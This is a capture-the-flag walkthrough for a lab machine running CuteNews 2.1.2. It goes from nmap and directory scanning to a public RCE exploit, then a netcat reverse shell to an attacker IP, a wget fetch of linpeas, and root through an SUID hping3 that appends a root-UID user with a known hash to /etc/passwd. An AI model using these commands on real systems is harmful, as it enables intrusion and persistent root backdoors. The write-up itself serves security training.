RATING
Easy
ENUMERATION
We kick it off with our usual nmap scan:
Command: nmap -sV -sC -T4 -Pn -p- 192.168.153.128
Heading over to the target in our browser, we get a default Apache server page:
Nothing else interesting there, so we proceed to run a directory bruteforce with feroxbuster and find index.php:
Command: feroxbuster -u http://192.168.153.128/ -w /usr/share/wordlists/dirb/common.txt -k -d 1 --quiet -s 200
Navigating to this in our browser, we see a login page for CuteNews running version 2.1.2:
Because we do not have any login credentials, we proceed to look for an exploit for CuteNews using searchsploit:
Command: searchsploit cutenews 2.1.2
EXPLOITATION
We proceed to download the 48800.py exploit:
Command: searchsploit -m 48800.py
Before we execute the exploit, we need to modify the code by removing all instances of the /CuteNews/ directory since our index.php is at the root of the server:
Running the exploit and entering our URL, drops us into a command shell as user www-data:
Command: python3 48800.py
This shell is pretty unusable as is. Luckily, the target has netcat installed and we can use it to create a reverse shell:
Command: nc 192.168.45.166 443 -e /bin/bash
We can catch this reverse shell and upgrade it:
Command: nc -nvlp 443
Command: python3 -c 'import pty;pty.spawn("/bin/bash")'
PRIVILEGE ESCALATION
After transferring linpeas over to the target, we execute it and discover that the binary hping3 has SUID permission set:
Command: python3 -m http.server 80 (on attacker machine)
Command: wget http://192.168.45.166/linpeas.sh (on target machine)
Command: chmod +x linpeas.sh
Command: ./linpeas.sh
We can execute this binary and it drops us into an hping3 shell with root privileges, but we are unable to run anything of real use with this shell:
Because we can use this shell to write to system files, back over on our attacker machine, we create a password hash for a new user test:
We can then add the following line to /etc/passwd:
test:$1$test$tCFQ7vKVJd/qDz0psLYXd/:0:0::/root:/bin/bash
However, if we try this directly on the target, we get the following error:
Command: echo 'test:$1$test$tCFQ7vKVJd/qDz0psLYXd/:0:0::/root:/bin/bash' >> /etc/passwd
Heading back to our attacker machine, we can base64 encode our string:
Command: echo 'test:$1$test$tCFQ7vKVJd/qDz0psLYXd/:0:0::/root:/bin/bash' | base64
We can now execute the encoded string on our target, decoding it before placing it in /etc/passwd with no error this time:
Command: echo "dGVzdDokMSR0ZXN0JHRDRlE3dktWSmQvcUR6MHBzTFlYZC86MDowOjovcm9vdDovYmluL2Jhc2gK" | base64 -d >> /etc/passwd
Now, it is only a matter of switching to our test user and reading our flag:
